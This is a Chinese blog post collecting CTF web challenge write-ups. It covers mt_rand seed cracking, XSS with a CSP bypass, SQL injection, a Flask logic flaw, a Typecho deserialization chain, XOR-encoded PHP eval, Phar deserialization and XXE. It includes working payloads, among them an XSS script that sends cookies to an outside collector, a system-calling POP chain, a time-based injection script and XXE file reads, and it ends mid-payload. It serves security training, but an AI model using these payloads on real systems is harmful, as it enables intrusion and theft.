web 刷题(五)

阅读数: 次 2021-01-04

[MRCTF2020]Ezaudit

2021.1.4

考点

mt_rand 种子爆破

做题步骤

打开网页没什么可以点击的。

扫下目录

有个备份文件，还有个 login.php

得到 index.php 的源码

<?php 
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // 若为空,视为未填写,提示错误,并3秒后返回登录界面
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
}
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥，咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }

    else{
        if($Private_key === '************'){
        $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 
        $link=mysql_connect("localhost","root","root");
        mysql_select_db("test",$link);
        $result = mysql_query($getuser);
        while($row=mysql_fetch_assoc($result)){
            echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
        }
    }
    }

} 
// genarate public_key 
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
  }

  //genarate private_key
  function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
  $Public_key = public_key();
  //$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

根据源码后面的部分

// genarate public_key 
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
  }

  //genarate private_key
  function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
  $Public_key = public_key();
  //$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

知道是根据公钥求私钥，

且返现利用的是 mt_rand 函数。

这个是可以爆破得到种子的。

str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
str2 = 'KVQP0LdJKRaV3n9D'
str3 = str1[::-1]
length = len(str2)
res = ''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '
            break
print(res)
# 36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61

然后利用 php_mt_seed 爆破

1775196155 对应版本 5.2.1+的

然后我们就可以自己求出对应的私钥了

<?php
mt_srand(1775196155);
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$public_key = '';
for ( $i = 0; $i < 16; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
echo $public_key;

echo "\n";

$strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$private_key = '';
for ( $i = 0; $i < 12; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
echo $private_key;

我的 php 版本太高于是利用 mamp的 5.2.1+ 版本php

KVQP0LdJKRaV3n9D

XuNhoueCDCGc

然后登陆后会利用 password 进行sql 操作。

这里直接利用万能密码绕过

用户名为 crispr

得到 flag

[CISCN2019 华东北赛区]Web2

2021.1.5

考点

Csp 绕过学习

sql注入

xss

做题步骤

注册登录，在投稿那，可以看到提示

管理员会查看，猜测可能有 xss

反馈也有可能存在 xss 漏洞

利用 Buu xss 在线网站的 xss代码

(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=nx7nVS&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();"

因为有 CSP

https://xz.aliyun.com/t/5084?accounttraceid=acb79116f0a643b5bdeb7192158fb75apuoa

绕过是修改 Buu xss 网站代码的

(new Image()).src 换成window.location.href

这样实现绕过

由于过滤了括号，需要编写脚本转换成html markup，即&#加上ascii码。

in_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=nx7nVS&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();"
output = ""

for c in in_str:
    output += "&#" + str(ord(c))

print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")

然后在反馈处填写这个地址。

http://web.node.xxxxxxxxx 这样的地址

有个 hash 的，我们利用爆破

import hashlib

def md5(a):
    return hashlib.md5(a.encode('utf-8')).hexdigest()

for i in range(0,100000000):
    if md5(str(i))[:6] == '6d0bc1':
        print (str(i))
        break

然后我们在外面的 xss.buuoj 接受到了。

修改网页的 PHPSESSID

然后发现网站有个 admin.php

进入后是根据 id 查找。猜测有 sql 注入

存在sql 注入

注入得到

0 union select 1,2,group_concat(table_name) from information_schema.tables# 得到 table 名字为 flag

0 union select 1,2,group_concat(column_name) from information_schema.columns# 得到字段有个为 flagg

0 union select 1,2, flagg from flag# 得到flag

也可以用 sqlmap

sqlmap -u "http://a161e3e8-58fd-4923-89ff-425244167e1e.node3.buuoj.cn/admin.php?id=4" --cookie="PHPSESSID=5bf4adbeec52092e2d54102000761a11" -T flag --dump --flush-session --fresh-queries

[DDCTF 2019]homebrew event loop

2021.1.6

考点

逻辑漏洞

flasksession

做题步骤

访问 ip/d5afe1f66147e857/

得到 source code

from flask import Flask, session, request, Response
import urllib

app = Flask(__name__)
app.secret_key = '*********************'  # censored
url_prefix = '/d5afe1f66147e857'


def FLAG():
    return '*********************'  # censored


def trigger_event(event):
    session['log'].append(event)
    if len(session['log']) > 5:
        session['log'] = session['log'][-5:]
    if type(event) == type([]):
        request.event_queue += event
    else:
        request.event_queue.append(event)


def get_mid_str(haystack, prefix, postfix=None):
    haystack = haystack[haystack.find(prefix)+len(prefix):]
    if postfix is not None:
        haystack = haystack[:haystack.find(postfix)]
    return haystack


class RollBackException:
    pass


def execute_event_loop():
    valid_event_chars = set(
        'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789:;#')
    resp = None
    while len(request.event_queue) > 0:
        # `event` is something like "action:ACTION;ARGS0#ARGS1#ARGS2......"
        event = request.event_queue[0]
        request.event_queue = request.event_queue[1:]
        if not event.startswith(('action:', 'func:')):
            continue
        for c in event:
            if c not in valid_event_chars:
                break
        else:
            is_action = event[0] == 'a'
            action = get_mid_str(event, ':', ';')
            args = get_mid_str(event, action+';').split('#')
            try:
                event_handler = eval(
                    action + ('_handler' if is_action else '_function'))
                ret_val = event_handler(args)
            except RollBackException:
                if resp is None:
                    resp = ''
                resp += 'ERROR! All transactions have been cancelled. <br />'
                resp += '<a href="./?action:view;index">Go back to index.html</a><br />'
                session['num_items'] = request.prev_session['num_items']
                session['points'] = request.prev_session['points']
                break
            except Exception, e:
                if resp is None:
                    resp = ''
                # resp += str(e) # only for debugging
                continue
            if ret_val is not None:
                if resp is None:
                    resp = ret_val
                else:
                    resp += ret_val
    if resp is None or resp == '':
        resp = ('404 NOT FOUND', 404)
    session.modified = True
    return resp


@app.route(url_prefix+'/')
def entry_point():
    querystring = urllib.unquote(request.query_string)
    request.event_queue = []
    if querystring == '' or (not querystring.startswith('action:')) or len(querystring) > 100:
        querystring = 'action:index;False#False'
    if 'num_items' not in session:
        session['num_items'] = 0
        session['points'] = 3
        session['log'] = []
    request.prev_session = dict(session)
    trigger_event(querystring)
    return execute_event_loop()

# handlers/functions below --------------------------------------


def view_handler(args):
    page = args[0]
    html = ''
    html += '[INFO] you have {} diamonds, {} points now.<br />'.format(
        session['num_items'], session['points'])
    if page == 'index':
        html += '<a href="./?action:index;True%23False">View source code</a><br />'
        html += '<a href="./?action:view;shop">Go to e-shop</a><br />'
        html += '<a href="./?action:view;reset">Reset</a><br />'
    elif page == 'shop':
        html += '<a href="./?action:buy;1">Buy a diamond (1 point)</a><br />'
    elif page == 'reset':
        del session['num_items']
        html += 'Session reset.<br />'
    html += '<a href="./?action:view;index">Go back to index.html</a><br />'
    return html


def index_handler(args):
    bool_show_source = str(args[0])
    bool_download_source = str(args[1])
    if bool_show_source == 'True':

        source = open('eventLoop.py', 'r')
        html = ''
        if bool_download_source != 'True':
            html += '<a href="./?action:index;True%23True">Download this .py file</a><br />'
            html += '<a href="./?action:view;index">Go back to index.html</a><br />'

        for line in source:
            if bool_download_source != 'True':
                html += line.replace('&', '&amp;').replace('\t', '&nbsp;'*4).replace(
                    ' ', '&nbsp;').replace('<', '&lt;').replace('>', '&gt;').replace('\n', '<br />')
            else:
                html += line
        source.close()

        if bool_download_source == 'True':
            headers = {}
            headers['Content-Type'] = 'text/plain'
            headers['Content-Disposition'] = 'attachment; filename=serve.py'
            return Response(html, headers=headers)
        else:
            return html
    else:
        trigger_event('action:view;index')


def buy_handler(args):
    num_items = int(args[0])
    if num_items <= 0:
        return 'invalid number({}) of diamonds to buy<br />'.format(args[0])
    session['num_items'] += num_items
    trigger_event(['func:consume_point;{}'.format(
        num_items), 'action:view;index'])


def consume_point_function(args):
    point_to_consume = int(args[0])
    if session['points'] < point_to_consume:
        raise RollBackException()
    session['points'] -= point_to_consume


def show_flag_function(args):
    flag = args[0]
    # return flag # GOTCHA! We noticed that here is a backdoor planted by a hacker which will print the flag, so we disabled it.
    return 'You naughty boy! ;) <br />'


def get_flag_handler(args):
    if session['num_items'] >= 5:
        # show_flag_function has been disabled, no worries
        trigger_event('func:show_flag;' + FLAG())
    trigger_event('action:view;index')


if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0')

分析源码。

先看到 flag 余姚我们的 num_items >= 5 但是我们的 points 初始为 3。正常情况 num_items 只能小于等于3。
得到 flag 的函数 get_flag_handler flag 会被写入 session 里面，如果调用这个函数，然后解密session 我们就能得到 flag。
发现网页功能的调用，用到的函数为 execute_event_loop 里面有一个 eval 函数，直接拼接我们传入的值，然后调用。
1
2
3
调用方法
event_handler = eval(action + ('_handler' if is_action else '_function'))
ret_val = event_handler(args)
源代码中 ('_handler' if is_action else '_function') 可以在 _function 后面加个 # 从而绕过后缀因为在布置之前利用的 get_mid_str 来获取对应的值

所以我们得到我们调用函数的传参方法为

?action:function_name#;action:xxx

然后需要知道的是我们怎么才能让 num_items >= 5 ，就要调用 buy_handler 这个方法。

这个方法有个参数 args 且 num_items 的值是根据传入参数来限定的。如果我们调用这个函数就能直接给 num_items 赋值为很大。

def buy_handler(args):
    num_items = int(args[0])
    if num_items <= 0:
        return 'invalid number({}) of diamonds to buy<br />'.format(args[0])
    session['num_items'] += num_items
    trigger_event(['func:consume_point;{}'.format(
        num_items), 'action:view;index'])

这里传入参数，action:trigger_event%23;action:buy;5%23action:get_flag;

因为方法的调用时从 request.event_queue 队列中找到的，如果我们单一调用 action:buy;5# 这样只会执行 buy 5 然后接下来的 consume_point_function 就会产生错误。所以我们要让程序在调用 action:buy;5# 只会马上执行 get_flag 因为 consume_point_function 的调用时加入队列然后在execute_event_loop 中调用的，所以我们需要先构建 action:buy;5# 只会马上执行 get_flag 的队列于是我们先调用 trigger_event 函数够着队列。

?action:trigger_event#;action:buy;5#action:get_flag;

event_handler = eval(action + ('_handler' if is_action else '_function'))
# -> event_handler = eval('trigger_event#’ + '_handler')
# -> event_handler = eval('trigger_event#_handler')
# <- trigger_event
ret_val = event_handler(args)
# -> trigger_event(['action:buy;5', 'action:get_flag;'])

运行 ?action:trigger_event;action:buy;5#action:get_flag;

查看session 解密

[GKCTF2020]EZ三剑客-EzTypecho

2021.1.7-8

考点

EzTypecho 反序列化漏洞。

PHP_SESSION_UPLOAD_PROGRESS 添加 session 属性。

http://www.tomyxy.com/index.php/archives/3.html

漏洞利用点分析。

做题步骤

测试发现是安装，

但是安装不了

直接搜看看有没有对应的漏洞

https://www.cnblogs.com/litlife/p/10798061.html

网页实现后知道只允许到 index.php

对了内容是反序列化收缩 index.php 的反序列化函数 unserialize()

第一个函数点

第二个函数点

然后查看一下我们可能调用的魔法函数 __destruct() __toString()等

利用思路

install.php中unserialize()内容可控==>install.php实例化了一个Typecho_Db，其中获取适配器名称$adapterName时调用了魔术方法__toString==>Feed.php执行__toString()的时候在获取screenName的时候调用了__get()方法==>Request.php中__get()中调用的get()，其中执行了_applyFilte==> Request.php中的_applyFilter()中使用了call_user_func()，该回调函数导致漏洞触发。

也可以利用 start 这里没有验证session

代码分析。

因为 start 和 finish 的后续代码类似。

我们分析 finish

在这里我们先利用 Typecho_Cookie 得到我们传入的 cookie 里面的 __typecho_config 进行base64 解密后在进行反序列化。

然后会将我们反序列化后的值带入 Typecho_Db类 的构造方法中。

我们查看构造方法。

在构造方法中，链接了 $adapterName 这里的字符串链接会调用 __toString() 方法。

我们全局搜索 __toString() 魔法函数

利用点是 Feed.php 里面的 __toString() 魔法函数

其中有一个获取对象属性

获取获得 screenName 如果数据没有这个属性会调用对应的 __get() 魔术方法。

全局找下这个 __get() 魔术方法

利用的是 Request.php 的 __get() 魔法函数

然后跟进去，获取对应的数值。然后会返回 _applyFilter 函数的执行结果跟进。

这个函数的定义会让 $filter 作为回调函数进行调用。如果我们可以控制就能够着对应的功能

所以我们从下往上一次布置。

我们传入的序列化入口。

是一个数组让数组的 adapter=new Typecho_Feed prefix="typecho_" 就行

我们会利用 Typecho_Feed类 的 __toString() 方法。且是调用 $item['author']->screenName

这要让程序进入这个 else if 分支 else if (self::RSS2 == $this->_type)

从而我们定义 Typcho_Feed类 中的属性 $this->_type = $this::RSS2;

且属性 $item数组 要有 link,title,date,content,author,category, 键值

我们让让 author 键值对应后面会调用的 __get()魔术方法的 Typecho_Request类

class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;

    public function __construct()
    {
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'content' => '1',
            'link' => '1',
            'date' => 1540996608,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}

最后一步利用的是 Typecho_Request类 中的 __get() 方法中的 get() 方法里面的 _applyFilter

这里最后调用。我们的 $_filter 和 $_params 需要为数组。且根据调用我们要找到的是 screenName 所以这里我们要布置 $_filter[0]= 调用方法 ，$_params['screenName']=调用参数

class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct(){
        $this->_params['screenName'] = 'curl XXXX';
        $this->_filter[0] = 'system';
    }
}

这样我们的 pop 链就构造好了

<?php
class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;

    public function __construct()
    {
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'content' => '1',
            'link' => '1',
            'date' => 1540996608,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}

class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct(){
        $this->_params['screenName'] = 'curl XXXX';
        $this->_filter[0] = 'system';
    }
}
$depy= array(
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
);
echo base64_encode(serialize($depy));
?>

[SWPU2019]Web4

2021.1.8

考点

PDO 场景 sql 注入

https://xz.aliyun.com/t/3950

利用 16进制+mysql 预编译绕过。

做题步骤

开局登录框

程序只有登录功能，没有注册功能。

然后不知什么思路扫目录也没什么东西

看了 wp 知道是利用的 sql 注入。

我们抓包测试一下

输入 admin admin 提示密码或用户名错误

然后添加 ' 看看出现报错

添加 '; 没有报错也可以利用 # 来闭合

然后我们测试 admin'|select

测试 admin'|from 报错了

根据报错信息猜测这个地方可能是被调用了

前面 select 没有报错，应该是被过滤了

利用 sql 字典测试

返回包 231 的全是被过滤了的字符

然后我不会了

只知道应该是可以利用堆叠注入的。

看了wp 学到利用 16进制+mysql 预编译进行绕过。

set @x=0xabcd;prepare s from @x;execute s; 利用这个方法来执行

测试。

使用的 pyload

# - - coding: UTF-8 -- 
#! /usr/bin/python3
#author: c1e4r


import requests
import json
import time
requests=requests.session()
proxies={'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'}
def main():
    	# payload = 'select if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()), {0}, 1))={1},sleep(4),0);'.format(i, j)
		# flag,user
		# payload = 'select if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flag"), {0}, 1))={1},sleep(4),0);'.format(i, j)
		# flag
		# payload = 'select if(ascii(substr((select flag from flag), {0}, 1))={1},sleep(4),0);'.format(i, j)
		# AmOL#T.zip
		# payload = 'select if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="user"), {0}, 1))={1},sleep(4),0);'.format(i, j)
		# username,password
		# payload = 'select if(ascii(substr((select password from user), {0}, 1))={1},sleep(4),0);'.format(i, j)
		# asdfjnia@*jbfdsb!

    #题目地址
    url = '''http://50070836-85a5-4521-87dd-604960070183.node3.buuoj.cn/index.php?r=Login/Login'''
    #注入payload
    payloads = "asd';set @a=0x{0};prepare ctftest from @a;execute ctftest;"
    flag = ''
    for i in range(1,40):
        #查询payload
        print(i)
        # payload = "select if(ascii(substr((select flag from flag),{0},1))={1},sleep(3),1)"
        for j in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.":
            payload = "select if((ascii(substr((select group_concat(flag) from flag),"+str(i)+",1))='"+str(ord(j))+"'),sleep(4),2);"
            #将构造好的payload进行16进制转码和json转码 
            datas = {"username":payloads.format(str_to_hex(payload)),"password":'test123'}
            data = json.dumps(datas)
            times = time.time()
            res = requests.post(url = url, data = data)
            if time.time() - times >= 3:
                flag = flag + j
                print(flag)
                break
            time.sleep(0.1)

def str_to_hex(s):
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])

if __name__ == '__main__':
    main()

访问后下载

是对应的源码。

进行代码审计

有个 flag.php

可以利用 extract() 函数实现参数覆盖。且可以利用 include 实现文件包含

这里的 $listData 直接利用 $_REQUEST 得到

所以这里是可用的来修改 userIndex.php 里面的值

发现里面有一个文件读取可以读取 $img_file 的内容，我们只要在上面的 extract() 修改 $img_file=/../flag.php 这样我们就能得到 flag.php 内容的 base64 编码

审计后利用 ?r=User/Index&img_file=/../flag.php 包含 flag.php 从而我们的保存为 base64

解密得到 flag

[ISITDTU 2019]EasyPHP

2021.1.9

考点

异或命令执行，

做题步骤

<?php
highlight_file(__FILE__);

$_ = @$_GET['_'];
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )
    die('rosé will not do it');

if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
    die('you are so close, omg');

eval($_);
?>

有两个过滤

第一个正则

1
2
3

\x00- 0-9                       匹配\x00到空格(\x20)，0-9的数字
'"`$&.,|[{_defgops              匹配这些字符
\x7F                            匹配DEL(\x7F)字符

这里想到的是直接利用 ~ 取反

1
2
3

第二个
strlen(count_chars(strtolower($_), 0x3))
不同的字符只能在 13个以内。

先看看能不能执行 phpinfo();

成功执行，看看有没有什么可用信息。

存在 disable_functions

然想利用 print_r(scandir('.')); 来列出当前的目录。

但是测试返现是超出了长度限制的。

?_=(~%8F%8D%96%91%8B%A0%8D)((~%8C%9C%9E%91%9B%96%8D)(%d1^%ff));

然后发现 ^ 异或符号是没有被ban 的。

这里可以利用 ^ 来够着对应的 payload

因为要够着 print_r(scandir('.'));

这里有个方法，利用多次异或，从而实现只用少数几个字符异或成为上面需要用到的字符串。

这样我们就能实现仅用 13个字符异或成为对应函数。

list1 = 'acdinprst'
list2 = []
for a in list1:
    for b in list1:
        for c in list1:
            for d in list1:
                if(ord(a)^ord(b)^ord(c) == ord(d)):
                    if(a==b==c==d)or(a==b)or(a==c)or(a==d):
                        continue
                    else:
                        list2.append(a+b+c+d)

(print_r)((scandir)(.));
?_=((%8f%8d%96%96%8b%a0%8d)^(%ff%ff%ff%ff%ff%ff%ff)^(%ff%ff%ff%8c%ff%ff%ff)^(%ff%ff%ff%8b%ff%ff%ff))(((%8c%9c%9c%96%8c%96%8d)^(%ff%ff%ff%ff%ff%ff%ff)^(%ff%ff%8f%8c%9c%ff%ff)^(%ff%ff%8d%8b%8b%ff%ff))(%d1^%ff));

(readfile)((end)((scandir)(.)));
?_=((%8c%9a%9e%9b%9c%96%93%9a)^(%ff%ff%ff%ff%ff%ff%ff%ff)^(%9b%ff%ff%ff%93%ff%ff%ff)^(%9a%ff%ff%ff%96%ff%ff%ff))(((%9a%9c%9b)^(%ff%ff%ff)^(%ff%93%ff)^(%ff%9e%ff))(((%8c%9c%9e%9c%9b%96%8c)^(%ff%ff%ff%ff%ff%ff%ff)^(%ff%ff%ff%93%ff%ff%9b)^(%ff%ff%ff%9e%ff%ff%9a))(%d1^%ff)));

[GXYCTF2019]BabysqliV3.0

2021.1.13

考点

文件包含

Phar 反序列化

做题步骤

一个登录框

输入用户名为 123 密码 123

提示没有用户。

输入用户名 admin 密码 admin

提示密码错误

测试一下有没有sql注入

提示没有测试 1’||’1’=’1 测试也提示没有有 user

可能是没有注入点的。

因为输入用户名为 admin 时。会提示密码错误，我们跑下弱密码看看能不能成功。

爆破得到密码为 password

登录后为一个文件上传点。

发现 url 里面的参数为 file= 可能存在文件包含。

尝试伪协议读源码

?file=php://filter/read=convert.base64-encode/resource=

发现不行

读取 home.php 成功

Home.php

<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Home</title>";
error_reporting(0);
if(isset($_SESSION['user'])){
	if(isset($_GET['file'])){
		if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
			die("hacker!");
		}
		else{
			if(preg_match("/home$/i", $_GET['file']) or preg_match("/upload$/i", $_GET['file'])){
				$file = $_GET['file'].".php";
			}
			else{
				$file = $_GET['file'].".fxxkyou!";
			}
			echo "当前引用的是 ".$file;
			require $file;
		}

	}
	else{
		die("no permission!");
	}
}
?>

发现过滤了不能读 flag文件。传入要有 home 或则 upload 结尾

所以应该还有一个 Upload.php 我们也读一下

Upload.php

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<form action="" method="post" enctype="multipart/form-data">
	上传文件
	<input type="file" name="file" />
	<input type="submit" name="submit" value="上传" />
</form>

<?php
error_reporting(0);
class Uploader{
	public $Filename;
	public $cmd;
	public $token;


	function __construct(){
		$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
		$ext = ".txt";
		@mkdir($sandbox, 0777, true);
		if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
			$this->Filename = $_GET['name'];
		}
		else{
			$this->Filename = $sandbox.$_SESSION['user'].$ext;
		}

		$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
		$this->token = $_SESSION['user'];
	}

	function upload($file){
		global $sandbox;
		global $ext;

		if(preg_match("[^a-z0-9]", $this->Filename)){
			$this->cmd = "die('illegal filename!');";
		}
		else{
			if($file['size'] > 1024){
				$this->cmd = "die('you are too big (′▽`〃)');";
			}
			else{
				$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
			}
		}
	}

	function __toString(){
		global $sandbox;
		global $ext;
		// return $sandbox.$this->Filename.$ext;
		return $this->Filename;
	}

	function __destruct(){
		if($this->token != $_SESSION['user']){
			$this->cmd = "die('check token falied!');";
		}
		eval($this->cmd);
	}
}

if(isset($_FILES['file'])) {
	$uploader = new Uploader();
	$uploader->upload($_FILES["file"]);
	if(@file_get_contents($uploader)){
		echo "下面是你上传的文件：<br>".$uploader."<br>";
		echo file_get_contents($uploader);
	}
}

?>

审计一下

里面有一个类且这个类最后有一个 __destruct 里面会调用到 eval($this->cmd);

这里，我们可以布置危险函数。

且我这里存在一个文件包含，且有一个可以够着恶意代码的类，所以我们想到的应该是利用

phar 反序列化来构造payload。

要能调用 eval($this->cmd); 这里我们要让我们的 $token=$_session['user']

然后我们知道上传文件后。我们的 $_session['user'] 会被作为文件名。且我们的文件上传后。会被打印文件路径和名字，文件的内容。

$this->Filename = $sandbox.$_SESSION['user'].$ext;

所以得到 $_session['user'] 我们可以利用上传一个文件来获得

<?php
class Uploader{
	public $Filename='test';
	public $cmd='highlight_file("/var/www/html/flag.php");';
	public $token='GXYf4ef4c7f14dcc30bdc401d798e3aadfb';
	
}

$o = new Uploader();

//phar生成代码
@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

上传后 Phar 伪协议读取flag

[HarekazeCTF2019]Avatar Uploader 1

2021.1.13

考点

根据要求传入文件。

做题步骤

1 2	<?php $f = finfo_open(FILEINFO_MIME_TYPE); var_dump(finfo_file($f, "test.bin"));

传入 test.bin

得到 flag

[BSidesCF 2019]SVGMagic

2021.1.13

考点

做题步骤

一个上传框。

上传一个 png 文件发现不行。

根据网站显示的英文猜测可能是要构造一个 SVG 文件，然后上传。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY file SYSTEM "file:///etc/passwd" >
]>
<svg height="100" width="1000">
<text x="5" y="15">&file;</text>
</svg>

尝试读取 flag

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >
]>
<svg height="100" width="1000">
<text x="5" y="15">&file;</text>
</svg>

[GoogleCTF2019 Quals]Bnv

2021.1.15

考点

xxe

做题步骤

利用嵌套xxe 得到

查看 wp https://a16n.github.io/2020/11/10/GoogleCTF2019-Quals-Bnv/

https://www.yuque.com/u390550/hsy6gq/ksmfiw

https://www.youtube.com/watch?v=0fdpFQXWVu4

查看网页源码

有个 post.js 查看内容

/*
Copyright 2019 Google LLC

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    https://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/

function AjaxFormPost() {
  var datasend;
  var message = document.getElementById('message').value;
  message = message.toLowerCase();

  var blindvalues = [
    '10',    '120',   '140',    '1450',   '150',   '1240',  '12450',
    '1250',  '240',   '2450',   '130',    '1230',  '1340',  '13450',
    '1350',  '12340', '123450', '12350',  '2340',  '23450', '1360',
    '12360', '24560', '13460',  '134560', '13560',
  ];

  var blindmap = new Map();
  var i;
  var message_new = '';

  for (i = 0; i < blindvalues.length; i++) {
    blindmap[i + 97] = blindvalues[i];
  }

  for (i = 0; i < message.length; i++) {
    message_new += blindmap[(message[i].charCodeAt(0))];
  }

  datasend = JSON.stringify({
    'message': message_new,
  });
  var url = '/api/search';
  xhr = new XMLHttpRequest();
  xhr.open('POST', url, true);
  xhr.setRequestHeader('Content-type', 'application/json');

  xhr.onreadystatechange =
      function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
        console.log(xhr.getResponseHeader('Content-Type'));
        if (xhr.getResponseHeader('Content-Type') == "application/json; charset=utf-8") {
            try {
                var json = JSON.parse(xhr.responseText);
                document.getElementById('database-data').value = json['ValueSearch'];
            }
            catch(e) {;
                document.getElementById('database-data').value = e.message;
            }
        }
        else {
            document.getElementById('database-data').value = xhr.responseText;
        }
    }
}
      xhr.send(datasend);
}

接收的 json 数据，可能存在 xxe 修改 Content-type: application/xml

然后发送有报错，说明是能解析 xml的

这里传入的 json 是 message 所以我们利用 xml 的时候要声明这个 message

然后利用外带，得到 flag

如果目标主机的防火墙十分严格,不允许我们请求外网服务器dtd,那么我们可以通过引入本地dtd文件实现XXE。

ubuntu系统自带/usr/share/yelp/dtd/docbookx.dtd文件

它定义了很多参数实体并调用,所以我们可以在内部重写一个该dtd文件中含有的参数实体,如ISOmaso

payload

<?xml version="1.0"?>
